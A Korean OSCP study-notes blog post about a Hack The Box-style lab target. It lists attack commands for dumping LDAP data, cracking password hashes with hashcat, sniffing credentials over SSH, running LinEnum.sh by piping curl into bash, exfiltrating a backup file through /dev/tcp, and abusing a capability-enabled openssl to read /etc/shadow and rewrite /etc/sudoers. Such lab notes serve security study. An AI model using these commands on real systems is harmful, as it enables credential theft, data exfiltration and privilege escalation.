OSCP/OSCP 공부일지
ldap + openssl
takudaddy
2021. 11. 24. 17:16
# ldapsearch -x -h 10.10.10.119 -s base namingcontexts
> namingcontexts 검색 후 아래 커맨드 입력
# ldapsearch -x -h 10.10.10.119 -b 'dc=lightweight,dc=htb'
![](https://blog.kakaocdn.net/dn/Ela3V/btrl4RVyTZJ/BKQJ3pL6hPb2mFwG1Hg1X0/img.png)
ldap 데이터를 덤프할 수 있다.
> 유저 별 패스워드 해시를 별도로 파일로 저장 후 해시캣 실행
$ ./hashcat --example-hashes >> 모드 검색
seach > $6$
$ ./hashcat -m 1800 hash.file /usr/share/wordlist/rockyou.txt
ssh 접속시 tcpdump + 와이어 샤크로 패킷 확인
$ ssh 10.10.2.4@10.10.10.110 "/usr/sbin/ecpdump -i ens33 -U -s0 -w -"
$ ssh 10.10.2.4@10.10.10.110 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark
-k -i -
ldap 패킷 확인 > authentication (인증 암호) 있을 수 있다.
투입 후 LinEnum.sh 실행
# python -m SimpleHTTPServer 80
--------------------
$ curl 10.10.2.4/LinEnum.sh | bash > 다운 없이 실행
netcat 없을 때 파일 전송
$ cat backup.7z > /dev/tcp/10.10.2.4/443
-------------------------------------
# ncat -lvnp 443 > backup.77z
$ getcap *
$ ./openssl enc -in /etc/shadow
$ ./openssl enc -in /etc/sudoers
$ vi sudoers >> edit user
$ cat ./sudoers | ./openssl enc -out /etc/sudoers >> write files
728x90